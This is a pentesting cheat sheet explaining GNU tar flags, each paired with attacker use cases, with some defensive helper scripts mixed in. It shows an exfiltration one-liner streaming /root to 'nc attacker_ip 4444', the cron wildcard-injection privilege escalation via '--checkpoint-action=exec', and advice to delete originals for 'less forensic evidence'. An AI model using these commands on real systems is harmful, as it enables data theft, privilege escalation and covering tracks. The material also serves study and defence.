tar
Tar command: useful flags with their explanation and use cases.
This guide walks through the different options and flags and where you might need them in an active engagement.
Basic Commands
Creates a new archive
tar -cvf backup.tar /path/to/directory
- c → create
- v → verbose
- f → filename
What it does?
Recursively archives files/directories.
Handling Corrupt Files
tar -cvf backup.tar /root --ignore-failed-read
- --ignore-failed-read → do not exit with an error status when a file cannot be read; the unreadable file is skipped and the rest of the archive is still written
Verify Archive Integrity
tar -cvf backup.tar /etc -W
- W → verify the archive against the source files right after writing it (only meaningful together with -c)
Pentesting Use Cases:
- Exfiltrating large datasets
- Ensuring the archive is not corrupted
Deleting Original Files After Archiving
tar -cvf loot.tar /tmp/loot --remove-files
- Clean artifacts after staging
- Remove sensitive traces
Preserves Absolute Path
tar -P -cf archive.tar /etc/passwd
- P → keep the leading / in member names
- Tar strips the leading / by default, because this:
  - Prevents overwriting arbitrary system files on extraction
  - Avoids archive extraction attacks
  - Is the safer default behavior
Pentesting Use Cases:
- Data exfiltration staging
- Bundling loot
- Archiving sensitive directories before transfer
💡 On compromised systems, tar is almost always installed → reliable for staging data.
Extract an archive
tar -xvf backup.tar
- x → extract
- v → verbose
- f → filename
What it does?
Extracts archive contents.
Keep old files
tar -xvf archive.tar -k
- k → keep existing files; tar does not overwrite them and reports an error for each one it skips
- Avoid damaging the system
Do not overwrite if the target is newer
tar -xvf archive.tar --keep-newer-files
Change Extraction Path
tar -xvf archive.tar -C /tmp
- C /tmp → change into /tmp before extracting, instead of using the current directory
Unlink (Delete) before extraction
tar -xUf archive.tar
- U → deletes (unlinks) the existing file first.
- For each file:
  - If the file exists → remove it completely
  - Then create a fresh file
- Normal tar behavior:
  - Tar opens the existing file
  - Overwrites its contents
  - But file metadata may remain
Pentesting Use Cases:
- Deploying uploaded tools
- Unpacking privesc scripts
- Extracting backups found on the system
💡 Extracting untrusted archives can be dangerous (path traversal risk).
List Archive Content
tar -tvf backup.tar
- t → list (view contents)
- v → verbose
- f → filename
What it does?
View archive contents without extracting.
Pentesting Use Cases:
- Before extracting an unknown archive:
tar -tf suspicious.tar
- Prevents accidental file overwrite
- Detects malicious archive entries like:
../../etc/passwd
--one-top-level
tar -xvf archive.tar --one-top-level[=name]
What it does?
Creates a new directory (named after the archive, or the name you give) and extracts all files inside it. Prevents path traversal attacks.
Pentesting Use Cases:
- Safe handling of untrusted archives
- Secure DevOps extraction
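A defender's pre-extraction check for the two entry shapes described above (absolute paths and ".." components), added here as an example; it is not part of the original guide, the function names are my own, and GNU tar is assumed:

```shell
#!/bin/sh
# Added example, not from the original page: inspect an untrusted archive with
# -t (nothing is extracted) and flag member names that are absolute or that
# contain a ".." path component, before anyone runs tar -x on it.

# Read member names on stdin, print only the dangerous ones.
flag_unsafe_names() {
  awk '
    /^\// { print; next }                  # absolute path, e.g. /etc/passwd
    {
      n = split($0, p, "/")
      for (i = 1; i <= n; i++)
        if (p[i] == "..") { print; break } # traversal, e.g. ../../etc/passwd
    }'
}

# Count offenders in a newline-separated list of names read from stdin.
count_unsafe() {
  flag_unsafe_names | grep -c . || true
}

# Usage: inspect_archive FILE
# Prints offenders to stderr; returns 1 if any were found, 0 if the archive
# only contains relative names without "..".
inspect_archive() {
  bad=$(tar -tf "$1" | flag_unsafe_names)
  if [ -n "$bad" ]; then
    printf 'UNSAFE members in %s:\n%s\n' "$1" "$bad" >&2
    return 1
  fi
  return 0
}
```

Run inspect_archive on a downloaded archive and only extract it when the function returns 0; combine with --one-top-level for an extra layer.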
Append Files
tar -rf backup.tar newfile.txt
What it does?
Adds files to the end of the archive.
⚠️ Cannot be used on compressed archives.
Pentesting Use Cases:
- Add new loot incrementally without rebuilding the archive.
Update (Append only if newer)
tar -uvf backup.tar file.txt
What it does?
Versioned archiving: adds the file only if it is newer than the archived version.
It DOES NOT replace the old copy → it appends a new version.
The archive may therefore contain multiple versions of the same file.
⚠️ Cannot be used on compressed archives.
To extract a specific version of a file from the archive:
tar -xvf backup.tar --occurrence=2 file.txt
Pentesting Use Cases:
- Incremental backups during a long engagement
- Preserving a timeline of file changes
Compare Archive to Filesystem
tar -dvf archive.tar
What it does?
- Compares the archive with the current filesystem.
- Detects modified files.
⚠️ Cannot be used on compressed archives.
Pentesting Use Cases:
- Forensic analysis
- Detect file tampering
💡 Useful during post-exploitation cleanup.
Delete From Archive
tar --delete -f archive.tar file.txt
What it does?
- Removes a file from the archive.
⚠️ Cannot be used on compressed archives.
====================================================================
Intermediate Commands
Incremental Backup
tar -g snapshot.file -cvf backup.tar /home
What it does?
- Tracks filesystem changes using a snapshot file.
⚠️ Cannot be used on compressed archives.
Pentesting Use Cases:
- Stealth data exfiltration
- Monitoring changed files
Usage
snapshot.file stores metadata about:
- inode numbers
- timestamps
- device numbers
- file state
tar -g snapshot.file -cvf backup2.tar /home
Now tar compares:
- The current filesystem
- The data inside snapshot.file
And only archives:
- Modified files and newly created files
🔥 This makes backup2.tar much smaller.
Restore
You must extract in order:
mkdir restore
cd restore
tar -xvf backup.tar
tar -xvf backup2.tar -g /dev/null
Why /dev/null?
During creation
The snapshot file is actively used.
During extraction
The snapshot file is NOT used. But tar's syntax requires that if the archive was created with -g, you must also supply -g when extracting. It's a syntactic requirement, not a functional one.
🧩 Why Tar Requires -g at Extraction
GNU tar stores special incremental metadata inside the archive:
- Directory state
- Deletion records
- Dump level markers
When extracting incremental archives, tar switches into incremental restore mode only if -g is specified.
If you don't use -g, tar may:
- Ignore deletion markers
- Not properly restore directory metadata
- Behave differently with incremental archives
So -g tells tar:
"This archive is incremental. Process it accordingly."
🧠 Why /dev/null Specifically?
During extraction:
- Tar needs a filename after -g
- But it does NOT actually read the snapshot file
- It only checks that one is supplied
So we give it:
/dev/null
Because:
- It exists
- It's harmless
- It contains nothing
- It discards any write attempts
Want to force a new full backup?
tar -g snapshot.file --level=0 -cvf full.tar /home
- --level=0 truncates the snapshot file first, so the whole tree is dumped again.
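The whole incremental cycle from this section (level-0 dump, snapshot file, level-1 dump containing only the changed and new files, restore in order with -g /dev/null), run end to end on a constructed directory; this is an added example with my own paths and function names, not code from the original guide, and it assumes GNU tar:

```shell
#!/bin/sh
# Added example, not from the original page. Builds a small tree under a work
# directory, takes the level-0 and level-1 dumps the guide describes, and
# restores them in order. All file names here are constructed for the demo.

# Create "$1"/backup.tar (full) and "$1"/backup2.tar (changes only).
incremental_cycle() {
  work=$1
  mkdir -p "$work/data"
  echo "unchanged" > "$work/data/same.txt"
  echo "v1"        > "$work/data/changed.txt"
  sleep 1   # make sure the files are strictly older than the first dump

  # Level-0 dump: everything is archived, snapshot.file records the state.
  tar -g "$work/snapshot.file" -cf "$work/backup.tar" -C "$work" data

  sleep 1   # give the modifications a newer timestamp than the snapshot
  echo "v2"  > "$work/data/changed.txt"
  echo "new" > "$work/data/new.txt"

  # Level-1 dump: only files that differ from the snapshot are archived;
  # same.txt is recorded in the directory listing but its data is not stored.
  tar -g "$work/snapshot.file" -cf "$work/backup2.tar" -C "$work" data
}

# Member names stored in an archive, one per line (directories included).
members() {
  tar -tf "$1"
}

# Restore: extract in creation order. -g /dev/null satisfies tar's syntax
# rule for incremental archives; the snapshot is not read during extraction.
# Prints the restored content of changed.txt ("v2").
restore() {
  work=$1
  mkdir -p "$work/restore"
  tar -xf "$work/backup.tar"  -C "$work/restore" -g /dev/null
  tar -xf "$work/backup2.tar" -C "$work/restore" -g /dev/null
  cat "$work/restore/data/changed.txt"
}
```

After restore, the restore/data directory holds same.txt from backup.tar plus the newer changed.txt and new.txt from backup2.tar.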
Sparse Files
tar -S -cvf db.tar database.img
What it does?
- Efficiently archives sparse files.
- Huge files with empty blocks.
- Examples:
  - VM disk images
  - Database files
Pentesting Use Cases:
- Archiving VM images found on the system
- Dumping database files efficiently
--to-command
tar -xf archive.tar --to-command=/bin/sh
- Tar will:
  - Extract each file
  - Pipe its contents to /bin/sh
- But /bin/sh expects commands, not file data.
tar -xf archive.tar --to-command='sh -c "echo pwned"'
or
tar -xf archive.tar --to-command='cat > /tmp/output'
- Tar will pipe each member's contents into the command's standard input instead of writing it to disk.
Pure in-memory streaming exfiltration
tar -czf - /root | nc attacker_ip 4444
- c → create archive
- z → gzip compress
- f - → write to stdout (NOT a file)
- | → pipe
- nc → send data over the network
Tar never writes to disk. It streams directly to netcat.
Attacker Side
nc -lvnp 4444 > received.tgz
- l → listen
- v → verbose
- n → no DNS
- p 4444 → port 4444
- > received.tgz → save the incoming data
Stream and auto-extract on the receiver
nc -lvnp 4444 | tar -xzf -
Replace nc with ssh (more advanced)
tar -czf - ~/labdata | ssh user@remote 'cat > loot.tar.gz'
Victim Side
tar -czf - ~/labdata | nc 127.0.0.1 4444
- 127.0.0.1 = local machine
- No file created on disk
- Archive streamed through memory
In-memory Staging through /dev/shm
/dev/shm is:
- A tmpfs filesystem
- Backed by RAM
- Not written to disk
- Cleared on reboot
tar -czf /dev/shm/cache.tgz /directory
Staging = preparing data before exfiltration.
In-memory staging = storing that staged data in RAM instead of on disk.
Wildcard Injection Privesc
You can create malicious filenames (in the same dir):
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
If a cron job runs:
tar -cf backup.tar *
the shell expands this to:
tar -cf backup.tar file1.txt file2.txt --checkpoint=1 --checkpoint-action=exec=sh shell.sh
and tar interprets these as options:
--checkpoint=1                          # Trigger a checkpoint every 1 record.
--checkpoint-action=exec=sh shell.sh    # At the checkpoint, execute this command.
💡 Use -- to stop option parsing:
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
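The defender's side of the wildcard trick above: a cron-safe replacement for `tar -cf backup.tar *` that never lets a file name reach tar's option parser, plus a quick check for planted names. This is an added example, not part of the original guide; the function names are my own and GNU tar/find are assumed.

```shell
#!/bin/sh
# Added example, not from the original page. Hardens the backup job from the
# wildcard-injection section and detects the file names that attack plants.

# Safe replacement for `cd DIR && tar -cf OUT *`.
# find emits explicit "./"-prefixed, NUL-separated paths, so a file named
# "--checkpoint=1" is stored as the member "./--checkpoint=1" and can never be
# parsed as an option. OUT should be an absolute path.
archive_dir() {
  dir=$1
  out=$2
  ( cd "$dir" && find . -mindepth 1 -print0 ) |
    tar -C "$dir" --null -T - -cf "$out"
}

# List files directly inside "$1" whose names start with "-".
# A hit here means someone wants a wildcard to turn their file into an option.
planted_option_names() {
  for f in "$1"/-*; do
    if [ -e "$f" ]; then
      printf '%s\n' "${f##*/}"
    fi
  done
}

# Does archive "$1" contain exactly the member "$2"? Returns 0 if yes.
has_member() {
  tar -tf "$1" | grep -qx -- "$2"
}
```

Run planted_option_names over any directory a scheduled tar job archives; an empty result is what you want to see.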
Other Usage
find / -name "*.tar*" 2>/dev/null
Search for backup files that may contain:
- source code
- credentials
- old configs
tar -g snap -cvf loot.tar /tmp/data --remove-files
- Archive only new data, then remove the originals.
- Less forensic evidence.
Related Commands & Tools
auditd = Linux Auditing System that records security-relevant events, system calls, and user activities to a log file.